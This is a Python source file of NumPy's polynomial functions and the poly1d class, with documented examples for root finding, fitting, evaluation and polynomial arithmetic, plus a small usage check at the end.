""" Functions to operate on polynomials. """ from __future__ import division, absolute_import, print_function __all__ = ['poly', 'roots', 'polyint', 'polyder', 'polyadd', 'polysub', 'polymul', 'polydiv', 'polyval', 'poly1d', 'polyfit', 'RankWarning'] import re import warnings import numpy.core.numeric as NX from numpy.core import (isscalar, abs, finfo, atleast_1d, hstack, dot, array, ones) from numpy.lib.twodim_base import diag, vander from numpy.lib.function_base import trim_zeros from numpy.lib.type_check import iscomplex, real, imag, mintypecode from numpy.linalg import eigvals, lstsq, inv class RankWarning(UserWarning): """ Issued by `polyfit` when the Vandermonde matrix is rank deficient. For more information, a way to suppress the warning, and an example of `RankWarning` being issued, see `polyfit`. """ pass def poly(seq_of_zeros): """ Find the coefficients of a polynomial with the given sequence of roots. Returns the coefficients of the polynomial whose leading coefficient is one for the given sequence of zeros (multiple roots must be included in the sequence as many times as their multiplicity; see Examples). A square matrix (or array, which will be treated as a matrix) can also be given, in which case the coefficients of the characteristic polynomial of the matrix are returned. Parameters ---------- seq_of_zeros : array_like, shape (N,) or (N, N) A sequence of polynomial roots, or a square array or matrix object. Returns ------- c : ndarray 1D array of polynomial coefficients from highest to lowest degree: ``c[0] * x**(N) + c[1] * x**(N-1) + ... + c[N-1] * x + c[N]`` where c[0] always equals 1. Raises ------ ValueError If input is the wrong shape (the input must be a 1-D or square 2-D array). See Also -------- polyval : Compute polynomial values. roots : Return the roots of a polynomial. polyfit : Least squares polynomial fit. poly1d : A one-dimensional polynomial class. Notes ----- Specifying the roots of a polynomial still leaves one degree of freedom, typically represented by an undetermined leading coefficient. [1]_ In the case of this function, that coefficient - the first one in the returned array - is always taken as one. (If for some reason you have one other point, the only automatic way presently to leverage that information is to use ``polyfit``.) The characteristic polynomial, :math:`p_a(t)`, of an `n`-by-`n` matrix **A** is given by :math:`p_a(t) = \\mathrm{det}(t\\, \\mathbf{I} - \\mathbf{A})`, where **I** is the `n`-by-`n` identity matrix. [2]_ References ---------- .. [1] M. Sullivan and M. Sullivan, III, "Algebra and Trignometry, Enhanced With Graphing Utilities," Prentice-Hall, pg. 318, 1996. .. [2] G. Strang, "Linear Algebra and Its Applications, 2nd Edition," Academic Press, pg. 182, 1980. Examples -------- Given a sequence of a polynomial's zeros: >>> np.poly((0, 0, 0)) # Multiple root example array([1, 0, 0, 0]) The line above represents z**3 + 0*z**2 + 0*z + 0. >>> np.poly((-1./2, 0, 1./2)) array([ 1. , 0. , -0.25, 0. ]) The line above represents z**3 - z/4 >>> np.poly((np.random.random(1.)[0], 0, np.random.random(1.)[0])) array([ 1. , -0.77086955, 0.08618131, 0. ]) #random Given a square array object: >>> P = np.array([[0, 1./3], [-1./2, 0]]) >>> np.poly(P) array([ 1. , 0. , 0.16666667]) Or a square matrix object: >>> np.poly(np.matrix(P)) array([ 1. , 0. , 0.16666667]) Note how in all cases the leading coefficient is always 1. 
""" seq_of_zeros = atleast_1d(seq_of_zeros) sh = seq_of_zeros.shape if len(sh) == 2 and sh[0] == sh[1] and sh[0] != 0: seq_of_zeros = eigvals(seq_of_zeros) elif len(sh) == 1: dt = seq_of_zeros.dtype # Let object arrays slip through, e.g. for arbitrary precision if dt != object: seq_of_zeros = seq_of_zeros.astype(mintypecode(dt.char)) else: raise ValueError("input must be 1d or non-empty square 2d array.") if len(seq_of_zeros) == 0: return 1.0 dt = seq_of_zeros.dtype a = ones((1,), dtype=dt) for k in range(len(seq_of_zeros)): a = NX.convolve(a, array([1, -seq_of_zeros[k]], dtype=dt), mode='full') if issubclass(a.dtype.type, NX.complexfloating): # if complex roots are all complex conjugates, the roots are real. roots = NX.asarray(seq_of_zeros, complex) if NX.all(NX.sort(roots) == NX.sort(roots.conjugate())): a = a.real.copy() return a def roots(p): """ Return the roots of a polynomial with coefficients given in p. The values in the rank-1 array `p` are coefficients of a polynomial. If the length of `p` is n+1 then the polynomial is described by:: p[0] * x**n + p[1] * x**(n-1) + ... + p[n-1]*x + p[n] Parameters ---------- p : array_like Rank-1 array of polynomial coefficients. Returns ------- out : ndarray An array containing the complex roots of the polynomial. Raises ------ ValueError When `p` cannot be converted to a rank-1 array. See also -------- poly : Find the coefficients of a polynomial with a given sequence of roots. polyval : Compute polynomial values. polyfit : Least squares polynomial fit. poly1d : A one-dimensional polynomial class. Notes ----- The algorithm relies on computing the eigenvalues of the companion matrix [1]_. References ---------- .. [1] R. A. Horn & C. R. Johnson, *Matrix Analysis*. Cambridge, UK: Cambridge University Press, 1999, pp. 146-7. Examples -------- >>> coeff = [3.2, 2, 1] >>> np.roots(coeff) array([-0.3125+0.46351241j, -0.3125-0.46351241j]) """ # If input is scalar, this makes it an array p = atleast_1d(p) if len(p.shape) != 1: raise ValueError("Input must be a rank-1 array.") # find non-zero array entries non_zero = NX.nonzero(NX.ravel(p))[0] # Return an empty array if polynomial is all zeros if len(non_zero) == 0: return NX.array([]) # find the number of trailing zeros -- this is the number of roots at 0. trailing_zeros = len(p) - non_zero[-1] - 1 # strip leading and trailing zeros p = p[int(non_zero[0]):int(non_zero[-1])+1] # casting: if incoming array isn't floating point, make it floating point. if not issubclass(p.dtype.type, (NX.floating, NX.complexfloating)): p = p.astype(float) N = len(p) if N > 1: # build companion matrix and find its eigenvalues (the roots) A = diag(NX.ones((N-2,), p.dtype), -1) A[0,:] = -p[1:] / p[0] roots = eigvals(A) else: roots = NX.array([]) # tack any zeros onto the back of the array roots = hstack((roots, NX.zeros(trailing_zeros, roots.dtype))) return roots def polyint(p, m=1, k=None): """ Return an antiderivative (indefinite integral) of a polynomial. The returned order `m` antiderivative `P` of polynomial `p` satisfies :math:`\\frac{d^m}{dx^m}P(x) = p(x)` and is defined up to `m - 1` integration constants `k`. The constants determine the low-order polynomial part .. math:: \\frac{k_{m-1}}{0!} x^0 + \\ldots + \\frac{k_0}{(m-1)!}x^{m-1} of `P` so that :math:`P^{(j)}(0) = k_{m-j-1}`. Parameters ---------- p : array_like or poly1d Polynomial to differentiate. A sequence is interpreted as polynomial coefficients, see `poly1d`. m : int, optional Order of the antiderivative. 
(Default: 1) k : list of `m` scalars or scalar, optional Integration constants. They are given in the order of integration: those corresponding to highest-order terms come first. If ``None`` (default), all constants are assumed to be zero. If `m = 1`, a single scalar can be given instead of a list. See Also -------- polyder : derivative of a polynomial poly1d.integ : equivalent method Examples -------- The defining property of the antiderivative: >>> p = np.poly1d([1,1,1]) >>> P = np.polyint(p) >>> P poly1d([ 0.33333333, 0.5 , 1. , 0. ]) >>> np.polyder(P) == p True The integration constants default to zero, but can be specified: >>> P = np.polyint(p, 3) >>> P(0) 0.0 >>> np.polyder(P)(0) 0.0 >>> np.polyder(P, 2)(0) 0.0 >>> P = np.polyint(p, 3, k=[6,5,3]) >>> P poly1d([ 0.01666667, 0.04166667, 0.16666667, 3. , 5. , 3. ]) Note that 3 = 6 / 2!, and that the constants are given in the order of integrations. Constant of the highest-order polynomial term comes first: >>> np.polyder(P, 2)(0) 6.0 >>> np.polyder(P, 1)(0) 5.0 >>> P(0) 3.0 """ m = int(m) if m < 0: raise ValueError("Order of integral must be positive (see polyder)") if k is None: k = NX.zeros(m, float) k = atleast_1d(k) if len(k) == 1 and m > 1: k = k[0]*NX.ones(m, float) if len(k) < m: raise ValueError( "k must be a scalar or a rank-1 array of length 1 or >m.") truepoly = isinstance(p, poly1d) p = NX.asarray(p) if m == 0: if truepoly: return poly1d(p) return p else: # Note: this must work also with object and integer arrays y = NX.concatenate((p.__truediv__(NX.arange(len(p), 0, -1)), [k[0]])) val = polyint(y, m - 1, k=k[1:]) if truepoly: return poly1d(val) return val def polyder(p, m=1): """ Return the derivative of the specified order of a polynomial. Parameters ---------- p : poly1d or sequence Polynomial to differentiate. A sequence is interpreted as polynomial coefficients, see `poly1d`. m : int, optional Order of differentiation (default: 1) Returns ------- der : poly1d A new polynomial representing the derivative. See Also -------- polyint : Anti-derivative of a polynomial. poly1d : Class for one-dimensional polynomials. Examples -------- The derivative of the polynomial :math:`x^3 + x^2 + x^1 + 1` is: >>> p = np.poly1d([1,1,1,1]) >>> p2 = np.polyder(p) >>> p2 poly1d([3, 2, 1]) which evaluates to: >>> p2(2.) 17.0 We can verify this, approximating the derivative with ``(f(x + h) - f(x))/h``: >>> (p(2. + 0.001) - p(2.)) / 0.001 17.007000999997857 The fourth-order derivative of a 3rd-order polynomial is zero: >>> np.polyder(p, 2) poly1d([6, 2]) >>> np.polyder(p, 3) poly1d([6]) >>> np.polyder(p, 4) poly1d([ 0.]) """ m = int(m) if m < 0: raise ValueError("Order of derivative must be positive (see polyint)") truepoly = isinstance(p, poly1d) p = NX.asarray(p) n = len(p) - 1 y = p[:-1] * NX.arange(n, 0, -1) if m == 0: val = p else: val = polyder(y, m - 1) if truepoly: val = poly1d(val) return val def polyfit(x, y, deg, rcond=None, full=False, w=None, cov=False): """ Least squares polynomial fit. Fit a polynomial ``p(x) = p[0] * x**deg + ... + p[deg]`` of degree `deg` to points `(x, y)`. Returns a vector of coefficients `p` that minimises the squared error. Parameters ---------- x : array_like, shape (M,) x-coordinates of the M sample points ``(x[i], y[i])``. y : array_like, shape (M,) or (M, K) y-coordinates of the sample points. Several data sets of sample points sharing the same x-coordinates can be fitted at once by passing in a 2D-array that contains one dataset per column. 
deg : int Degree of the fitting polynomial rcond : float, optional Relative condition number of the fit. Singular values smaller than this relative to the largest singular value will be ignored. The default value is len(x)*eps, where eps is the relative precision of the float type, about 2e-16 in most cases. full : bool, optional Switch determining nature of return value. When it is False (the default) just the coefficients are returned, when True diagnostic information from the singular value decomposition is also returned. w : array_like, shape (M,), optional Weights to apply to the y-coordinates of the sample points. For gaussian uncertainties, use 1/sigma (not 1/sigma**2). cov : bool, optional Return the estimate and the covariance matrix of the estimate If full is True, then cov is not returned. Returns ------- p : ndarray, shape (deg + 1,) or (deg + 1, K) Polynomial coefficients, highest power first. If `y` was 2-D, the coefficients for `k`-th data set are in ``p[:,k]``. residuals, rank, singular_values, rcond Present only if `full` = True. Residuals of the least-squares fit, the effective rank of the scaled Vandermonde coefficient matrix, its singular values, and the specified value of `rcond`. For more details, see `linalg.lstsq`. V : ndarray, shape (M,M) or (M,M,K) Present only if `full` = False and `cov`=True. The covariance matrix of the polynomial coefficient estimates. The diagonal of this matrix are the variance estimates for each coefficient. If y is a 2-D array, then the covariance matrix for the `k`-th data set are in ``V[:,:,k]`` Warns ----- RankWarning The rank of the coefficient matrix in the least-squares fit is deficient. The warning is only raised if `full` = False. The warnings can be turned off by >>> import warnings >>> warnings.simplefilter('ignore', np.RankWarning) See Also -------- polyval : Compute polynomial values. linalg.lstsq : Computes a least-squares fit. scipy.interpolate.UnivariateSpline : Computes spline fits. Notes ----- The solution minimizes the squared error .. math :: E = \\sum_{j=0}^k |p(x_j) - y_j|^2 in the equations:: x[0]**n * p[0] + ... + x[0] * p[n-1] + p[n] = y[0] x[1]**n * p[0] + ... + x[1] * p[n-1] + p[n] = y[1] ... x[k]**n * p[0] + ... + x[k] * p[n-1] + p[n] = y[k] The coefficient matrix of the coefficients `p` is a Vandermonde matrix. `polyfit` issues a `RankWarning` when the least-squares fit is badly conditioned. This implies that the best fit is not well-defined due to numerical error. The results may be improved by lowering the polynomial degree or by replacing `x` by `x` - `x`.mean(). The `rcond` parameter can also be set to a value smaller than its default, but the resulting fit may be spurious: including contributions from the small singular values can add numerical noise to the result. Note that fitting polynomial coefficients is inherently badly conditioned when the degree of the polynomial is large or the interval of sample points is badly centered. The quality of the fit should always be checked in these cases. When polynomial fits are not satisfactory, splines may be a good alternative. References ---------- .. [1] Wikipedia, "Curve fitting", http://en.wikipedia.org/wiki/Curve_fitting .. 
[2] Wikipedia, "Polynomial interpolation",
           http://en.wikipedia.org/wiki/Polynomial_interpolation

    Examples
    --------
    >>> x = np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0])
    >>> y = np.array([0.0, 0.8, 0.9, 0.1, -0.8, -1.0])
    >>> z = np.polyfit(x, y, 3)
    >>> z
    array([ 0.08703704, -0.81349206,  1.69312169, -0.03968254])

    It is convenient to use `poly1d` objects for dealing with polynomials:

    >>> p = np.poly1d(z)
    >>> p(0.5)
    0.6143849206349179
    >>> p(3.5)
    -0.34732142857143039
    >>> p(10)
    22.579365079365115

    High-order polynomials may oscillate wildly:

    >>> p30 = np.poly1d(np.polyfit(x, y, 30))
    /... RankWarning: Polyfit may be poorly conditioned...
    >>> p30(4)
    -0.80000000000000204
    >>> p30(5)
    -0.99999999999999445
    >>> p30(4.5)
    -0.10547061179440398

    Illustration:

    >>> import matplotlib.pyplot as plt
    >>> xp = np.linspace(-2, 6, 100)
    >>> _ = plt.plot(x, y, '.', xp, p(xp), '-', xp, p30(xp), '--')
    >>> plt.ylim(-2,2)
    (-2, 2)
    >>> plt.show()

    """
    order = int(deg) + 1
    x = NX.asarray(x) + 0.0
    y = NX.asarray(y) + 0.0

    # check arguments.
    if deg < 0:
        raise ValueError("expected deg >= 0")
    if x.ndim != 1:
        raise TypeError("expected 1D vector for x")
    if x.size == 0:
        raise TypeError("expected non-empty vector for x")
    if y.ndim < 1 or y.ndim > 2:
        raise TypeError("expected 1D or 2D array for y")
    if x.shape[0] != y.shape[0]:
        raise TypeError("expected x and y to have same length")

    # set rcond
    if rcond is None:
        rcond = len(x)*finfo(x.dtype).eps

    # set up least squares equation for powers of x
    lhs = vander(x, order)
    rhs = y

    # apply weighting
    if w is not None:
        w = NX.asarray(w) + 0.0
        if w.ndim != 1:
            raise TypeError("expected a 1-d array for weights")
        if w.shape[0] != y.shape[0]:
            raise TypeError("expected w and y to have the same length")
        lhs *= w[:, NX.newaxis]
        if rhs.ndim == 2:
            rhs *= w[:, NX.newaxis]
        else:
            rhs *= w

    # scale lhs to improve condition number and solve
    scale = NX.sqrt((lhs*lhs).sum(axis=0))
    lhs /= scale
    c, resids, rank, s = lstsq(lhs, rhs, rcond)
    c = (c.T/scale).T  # broadcast scale coefficients

    # warn on rank reduction, which indicates an ill conditioned matrix
    if rank != order and not full:
        msg = "Polyfit may be poorly conditioned"
        warnings.warn(msg, RankWarning, stacklevel=2)

    if full:
        return c, resids, rank, s, rcond
    elif cov:
        Vbase = inv(dot(lhs.T, lhs))
        Vbase /= NX.outer(scale, scale)
        # Some literature ignores the extra -2.0 factor in the denominator, but
        # it is included here because the covariance of Multivariate Student-T
        # (which is implied by a Bayesian uncertainty analysis) includes it.
        # Plus, it gives a slightly more conservative estimate of uncertainty.
        if len(x) <= order + 2:
            raise ValueError("the number of data points must exceed order + 2 "
                             "for a Bayesian estimate of the covariance matrix")
        fac = resids / (len(x) - order - 2.0)
        if y.ndim == 1:
            return c, Vbase * fac
        else:
            return c, Vbase[:,:, NX.newaxis] * fac
    else:
        return c


def polyval(p, x):
    """
    Evaluate a polynomial at specific values.

    If `p` is of length N, this function returns the value:

        ``p[0]*x**(N-1) + p[1]*x**(N-2) + ... + p[N-2]*x + p[N-1]``

    If `x` is a sequence, then `p(x)` is returned for each element of `x`.
    If `x` is another polynomial then the composite polynomial `p(x(t))`
    is returned.

    Parameters
    ----------
    p : array_like or poly1d object
       1D array of polynomial coefficients (including coefficients equal
       to zero) from highest degree to the constant term, or an
       instance of poly1d.
    x : array_like or poly1d object
       A number, an array of numbers, or an instance of poly1d, at
       which to evaluate `p`.

Returns ------- values : ndarray or poly1d If `x` is a poly1d instance, the result is the composition of the two polynomials, i.e., `x` is "substituted" in `p` and the simplified result is returned. In addition, the type of `x` - array_like or poly1d - governs the type of the output: `x` array_like => `values` array_like, `x` a poly1d object => `values` is also. See Also -------- poly1d: A polynomial class. Notes ----- Horner's scheme [1]_ is used to evaluate the polynomial. Even so, for polynomials of high degree the values may be inaccurate due to rounding errors. Use carefully. References ---------- .. [1] I. N. Bronshtein, K. A. Semendyayev, and K. A. Hirsch (Eng. trans. Ed.), *Handbook of Mathematics*, New York, Van Nostrand Reinhold Co., 1985, pg. 720. Examples -------- >>> np.polyval([3,0,1], 5) # 3 * 5**2 + 0 * 5**1 + 1 76 >>> np.polyval([3,0,1], np.poly1d(5)) poly1d([ 76.]) >>> np.polyval(np.poly1d([3,0,1]), 5) 76 >>> np.polyval(np.poly1d([3,0,1]), np.poly1d(5)) poly1d([ 76.]) """ p = NX.asarray(p) if isinstance(x, poly1d): y = 0 else: x = NX.asarray(x) y = NX.zeros_like(x) for i in range(len(p)): y = y * x + p[i] return y def polyadd(a1, a2): """ Find the sum of two polynomials. Returns the polynomial resulting from the sum of two input polynomials. Each input must be either a poly1d object or a 1D sequence of polynomial coefficients, from highest to lowest degree. Parameters ---------- a1, a2 : array_like or poly1d object Input polynomials. Returns ------- out : ndarray or poly1d object The sum of the inputs. If either input is a poly1d object, then the output is also a poly1d object. Otherwise, it is a 1D array of polynomial coefficients from highest to lowest degree. See Also -------- poly1d : A one-dimensional polynomial class. poly, polyadd, polyder, polydiv, polyfit, polyint, polysub, polyval Examples -------- >>> np.polyadd([1, 2], [9, 5, 4]) array([9, 6, 6]) Using poly1d objects: >>> p1 = np.poly1d([1, 2]) >>> p2 = np.poly1d([9, 5, 4]) >>> print(p1) 1 x + 2 >>> print(p2) 2 9 x + 5 x + 4 >>> print(np.polyadd(p1, p2)) 2 9 x + 6 x + 6 """ truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d)) a1 = atleast_1d(a1) a2 = atleast_1d(a2) diff = len(a2) - len(a1) if diff == 0: val = a1 + a2 elif diff > 0: zr = NX.zeros(diff, a1.dtype) val = NX.concatenate((zr, a1)) + a2 else: zr = NX.zeros(abs(diff), a2.dtype) val = a1 + NX.concatenate((zr, a2)) if truepoly: val = poly1d(val) return val def polysub(a1, a2): """ Difference (subtraction) of two polynomials. Given two polynomials `a1` and `a2`, returns ``a1 - a2``. `a1` and `a2` can be either array_like sequences of the polynomials' coefficients (including coefficients equal to zero), or `poly1d` objects. Parameters ---------- a1, a2 : array_like or poly1d Minuend and subtrahend polynomials, respectively. Returns ------- out : ndarray or poly1d Array or `poly1d` object of the difference polynomial's coefficients. See Also -------- polyval, polydiv, polymul, polyadd Examples -------- .. math:: (2 x^2 + 10 x - 2) - (3 x^2 + 10 x -4) = (-x^2 + 2) >>> np.polysub([2, 10, -2], [3, 10, -4]) array([-1, 0, 2]) """ truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d)) a1 = atleast_1d(a1) a2 = atleast_1d(a2) diff = len(a2) - len(a1) if diff == 0: val = a1 - a2 elif diff > 0: zr = NX.zeros(diff, a1.dtype) val = NX.concatenate((zr, a1)) - a2 else: zr = NX.zeros(abs(diff), a2.dtype) val = a1 - NX.concatenate((zr, a2)) if truepoly: val = poly1d(val) return val def polymul(a1, a2): """ Find the product of two polynomials. 
Finds the polynomial resulting from the multiplication of the two input
    polynomials. Each input must be either a poly1d object or a 1D sequence
    of polynomial coefficients, from highest to lowest degree.

    Parameters
    ----------
    a1, a2 : array_like or poly1d object
        Input polynomials.

    Returns
    -------
    out : ndarray or poly1d object
        The polynomial resulting from the multiplication of the inputs. If
        either inputs is a poly1d object, then the output is also a poly1d
        object. Otherwise, it is a 1D array of polynomial coefficients from
        highest to lowest degree.

    See Also
    --------
    poly1d : A one-dimensional polynomial class.
    poly, polyadd, polyder, polydiv, polyfit, polyint, polysub, polyval
    convolve : Array convolution. Same output as polymul, but has parameter
               for overlap mode.

    Examples
    --------
    >>> np.polymul([1, 2, 3], [9, 5, 1])
    array([ 9, 23, 38, 17,  3])

    Using poly1d objects:

    >>> p1 = np.poly1d([1, 2, 3])
    >>> p2 = np.poly1d([9, 5, 1])
    >>> print(p1)
       2
    1 x + 2 x + 3
    >>> print(p2)
       2
    9 x + 5 x + 1
    >>> print(np.polymul(p1, p2))
       4      3      2
    9 x + 23 x + 38 x + 17 x + 3

    """
    truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d))
    a1, a2 = poly1d(a1), poly1d(a2)
    val = NX.convolve(a1, a2)
    if truepoly:
        val = poly1d(val)
    return val


def polydiv(u, v):
    """
    Returns the quotient and remainder of polynomial division.

    The input arrays are the coefficients (including any coefficients
    equal to zero) of the "numerator" (dividend) and "denominator"
    (divisor) polynomials, respectively.

    Parameters
    ----------
    u : array_like or poly1d
        Dividend polynomial's coefficients.
    v : array_like or poly1d
        Divisor polynomial's coefficients.

    Returns
    -------
    q : ndarray
        Coefficients, including those equal to zero, of the quotient.
    r : ndarray
        Coefficients, including those equal to zero, of the remainder.

    See Also
    --------
    poly, polyadd, polyder, polydiv, polyfit, polyint, polymul, polysub,
    polyval

    Notes
    -----
    Both `u` and `v` must be 0-d or 1-d (ndim = 0 or 1), but `u.ndim` need
    not equal `v.ndim`. In other words, all four possible combinations -
    ``u.ndim = v.ndim = 0``, ``u.ndim = v.ndim = 1``,
    ``u.ndim = 1, v.ndim = 0``, and ``u.ndim = 0, v.ndim = 1`` - work.

    Examples
    --------
    .. math:: \\frac{3x^2 + 5x + 2}{2x + 1} = 1.5x + 1.75, remainder 0.25

    >>> x = np.array([3.0, 5.0, 2.0])
    >>> y = np.array([2.0, 1.0])
    >>> np.polydiv(x, y)
    (array([ 1.5 ,  1.75]), array([ 0.25]))

    """
    truepoly = (isinstance(u, poly1d) or isinstance(v, poly1d))
    u = atleast_1d(u) + 0.0
    v = atleast_1d(v) + 0.0
    # w has the common type
    w = u[0] + v[0]
    m = len(u) - 1
    n = len(v) - 1
    scale = 1. / v[0]
    q = NX.zeros((max(m - n + 1, 1),), w.dtype)
    r = u.copy()
    for k in range(0, m-n+1):
        d = scale * r[k]
        q[k] = d
        r[k:k+n+1] -= d*v
    while NX.allclose(r[0], 0, rtol=1e-14) and (r.shape[-1] > 1):
        r = r[1:]
    if truepoly:
        return poly1d(q), poly1d(r)
    return q, r

_poly_mat = re.compile(r"[*][*]([0-9]*)")
def _raise_power(astr, wrap=70):
    # Pretty-printing helper: lifts the exponents of '**' terms onto the
    # line above, so printed polynomials read like handwritten math.
    n = 0
    line1 = ''
    line2 = ''
    output = ' '
    while True:
        mat = _poly_mat.search(astr, n)
        if mat is None:
            break
        span = mat.span()
        power = mat.groups()[0]
        partstr = astr[n:span[0]]
        n = span[1]
        toadd2 = partstr + ' '*(len(power)-1)
        toadd1 = ' '*(len(partstr)-1) + power
        if ((len(line2) + len(toadd2) > wrap) or
                (len(line1) + len(toadd1) > wrap)):
            output += line1 + "\n" + line2 + "\n "
            line1 = toadd1
            line2 = toadd2
        else:
            line2 += partstr + ' '*(len(power)-1)
            line1 += ' '*(len(partstr)-1) + power
    output += line1 + "\n" + line2
    return output + astr[n:]


class poly1d(object):
    """
    A one-dimensional polynomial class.

A convenience class, used to encapsulate "natural" operations on polynomials so that said operations may take on their customary form in code (see Examples). Parameters ---------- c_or_r : array_like The polynomial's coefficients, in decreasing powers, or if the value of the second parameter is True, the polynomial's roots (values where the polynomial evaluates to 0). For example, ``poly1d([1, 2, 3])`` returns an object that represents :math:`x^2 + 2x + 3`, whereas ``poly1d([1, 2, 3], True)`` returns one that represents :math:`(x-1)(x-2)(x-3) = x^3 - 6x^2 + 11x -6`. r : bool, optional If True, `c_or_r` specifies the polynomial's roots; the default is False. variable : str, optional Changes the variable used when printing `p` from `x` to `variable` (see Examples). Examples -------- Construct the polynomial :math:`x^2 + 2x + 3`: >>> p = np.poly1d([1, 2, 3]) >>> print(np.poly1d(p)) 2 1 x + 2 x + 3 Evaluate the polynomial at :math:`x = 0.5`: >>> p(0.5) 4.25 Find the roots: >>> p.r array([-1.+1.41421356j, -1.-1.41421356j]) >>> p(p.r) array([ -4.44089210e-16+0.j, -4.44089210e-16+0.j]) These numbers in the previous line represent (0, 0) to machine precision Show the coefficients: >>> p.c array([1, 2, 3]) Display the order (the leading zero-coefficients are removed): >>> p.order 2 Show the coefficient of the k-th power in the polynomial (which is equivalent to ``p.c[-(i+1)]``): >>> p[1] 2 Polynomials can be added, subtracted, multiplied, and divided (returns quotient and remainder): >>> p * p poly1d([ 1, 4, 10, 12, 9]) >>> (p**3 + 4) / p (poly1d([ 1., 4., 10., 12., 9.]), poly1d([ 4.])) ``asarray(p)`` gives the coefficient array, so polynomials can be used in all functions that accept arrays: >>> p**2 # square of polynomial poly1d([ 1, 4, 10, 12, 9]) >>> np.square(p) # square of individual coefficients array([1, 4, 9]) The variable used in the string representation of `p` can be modified, using the `variable` parameter: >>> p = np.poly1d([1,2,3], variable='z') >>> print(p) 2 1 z + 2 z + 3 Construct a polynomial from its roots: >>> np.poly1d([1, 2], True) poly1d([ 1, -3, 2]) This is the same polynomial as obtained by: >>> np.poly1d([1, -1]) * np.poly1d([1, -2]) poly1d([ 1, -3, 2]) """ coeffs = None order = None variable = None __hash__ = None def __init__(self, c_or_r, r=0, variable=None): if isinstance(c_or_r, poly1d): for key in c_or_r.__dict__.keys(): self.__dict__[key] = c_or_r.__dict__[key] if variable is not None: self.__dict__['variable'] = variable return if r: c_or_r = poly(c_or_r) c_or_r = atleast_1d(c_or_r) if len(c_or_r.shape) > 1: raise ValueError("Polynomial must be 1d only.") c_or_r = trim_zeros(c_or_r, trim='f') if len(c_or_r) == 0: c_or_r = NX.array([0.]) self.__dict__['coeffs'] = c_or_r self.__dict__['order'] = len(c_or_r) - 1 if variable is None: variable = 'x' self.__dict__['variable'] = variable def __array__(self, t=None): if t: return NX.asarray(self.coeffs, t) else: return NX.asarray(self.coeffs) def __repr__(self): vals = repr(self.coeffs) vals = vals[6:-1] return "poly1d(%s)" % vals def __len__(self): return self.order def __str__(self): thestr = "0" var = self.variable # Remove leading zeros coeffs = self.coeffs[NX.logical_or.accumulate(self.coeffs != 0)] N = len(coeffs)-1 def fmt_float(q): s = '%.4g' % q if s.endswith('.0000'): s = s[:-5] return s for k in range(len(coeffs)): if not iscomplex(coeffs[k]): coefstr = fmt_float(real(coeffs[k])) elif real(coeffs[k]) == 0: coefstr = '%sj' % fmt_float(imag(coeffs[k])) else: coefstr = '(%s + %sj)' % (fmt_float(real(coeffs[k])), 
fmt_float(imag(coeffs[k]))) power = (N-k) if power == 0: if coefstr != '0': newstr = '%s' % (coefstr,) else: if k == 0: newstr = '0' else: newstr = '' elif power == 1: if coefstr == '0': newstr = '' elif coefstr == 'b': newstr = var else: newstr = '%s %s' % (coefstr, var) else: if coefstr == '0': newstr = '' elif coefstr == 'b': newstr = '%s**%d' % (var, power,) else: newstr = '%s %s**%d' % (coefstr, var, power) if k > 0: if newstr != '': if newstr.startswith('-'): thestr = "%s - %s" % (thestr, newstr[1:]) else: thestr = "%s + %s" % (thestr, newstr) else: thestr = newstr return _raise_power(thestr) def __call__(self, val): return polyval(self.coeffs, val) def __neg__(self): return poly1d(-self.coeffs) def __pos__(self): return self def __mul__(self, other): if isscalar(other): return poly1d(self.coeffs * other) else: other = poly1d(other) return poly1d(polymul(self.coeffs, other.coeffs)) def __rmul__(self, other): if isscalar(other): return poly1d(other * self.coeffs) else: other = poly1d(other) return poly1d(polymul(self.coeffs, other.coeffs)) def __add__(self, other): other = poly1d(other) return poly1d(polyadd(self.coeffs, other.coeffs)) def __radd__(self, other): other = poly1d(other) return poly1d(polyadd(self.coeffs, other.coeffs)) def __pow__(self, val): if not isscalar(val) or int(val) != val or val < 0: raise ValueError("Power to non-negative integers only.") res = [1] for _ in range(val): res = polymul(self.coeffs, res) return poly1d(res) def __sub__(self, other): other = poly1d(other) return poly1d(polysub(self.coeffs, other.coeffs)) def __rsub__(self, other): other = poly1d(other) return poly1d(polysub(other.coeffs, self.coeffs)) def __div__(self, other): if isscalar(other): return poly1d(self.coeffs/other) else: other = poly1d(other) return polydiv(self, other) __truediv__ = __div__ def __rdiv__(self, other): if isscalar(other): return poly1d(other/self.coeffs) else: other = poly1d(other) return polydiv(other, self) __rtruediv__ = __rdiv__ def __eq__(self, other): if self.coeffs.shape != other.coeffs.shape: return False return (self.coeffs == other.coeffs).all() def __ne__(self, other): return not self.__eq__(other) def __setattr__(self, key, val): raise ValueError("Attributes cannot be changed this way.") def __getattr__(self, key): if key in ['r', 'roots']: return roots(self.coeffs) elif key in ['c', 'coef', 'coefficients']: return self.coeffs elif key in ['o']: return self.order else: try: return self.__dict__[key] except KeyError: raise AttributeError( "'%s' has no attribute '%s'" % (self.__class__, key)) def __getitem__(self, val): ind = self.order - val if val > self.order: return 0 if val < 0: return 0 return self.coeffs[ind] def __setitem__(self, key, val): ind = self.order - key if key < 0: raise ValueError("Does not support negative powers.") if key > self.order: zr = NX.zeros(key-self.order, self.coeffs.dtype) self.__dict__['coeffs'] = NX.concatenate((zr, self.coeffs)) self.__dict__['order'] = key ind = 0 self.__dict__['coeffs'][ind] = val return def __iter__(self): return iter(self.coeffs) def integ(self, m=1, k=0): """ Return an antiderivative (indefinite integral) of this polynomial. Refer to `polyint` for full documentation. See Also -------- polyint : equivalent function """ return poly1d(polyint(self.coeffs, m=m, k=k)) def deriv(self, m=1): """ Return a derivative of this polynomial. Refer to `polyder` for full documentation. 
See Also -------- polyder : equivalent function """ return poly1d(polyder(self.coeffs, m=m)) # Stuff to do on module import warnings.simplefilter('always', RankWarning)
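
# ----------------------------------------------------------------------
# Usage sketch (not part of the upstream module): a minimal, hedged demo
# of the public helpers defined above, assuming only names already
# imported in this file (NX, poly, roots, polyfit, poly1d). Expected
# values are exact up to floating-point error.
if __name__ == '__main__':
    # roots -> coefficients -> roots round trip: poly() builds the monic
    # polynomial from its roots; roots() recovers them from the
    # eigenvalues of the companion matrix.
    coeffs = poly([2.0, -1.0, 0.5])
    assert NX.allclose(poly(roots(coeffs)), coeffs)

    # Fitting a quadratic to exact quadratic data recovers the
    # coefficients (highest power first).
    x = NX.arange(-3.0, 4.0)
    y = 2.0 * x ** 2 - x + 1.0
    assert NX.allclose(polyfit(x, y, 2), [2.0, -1.0, 1.0])

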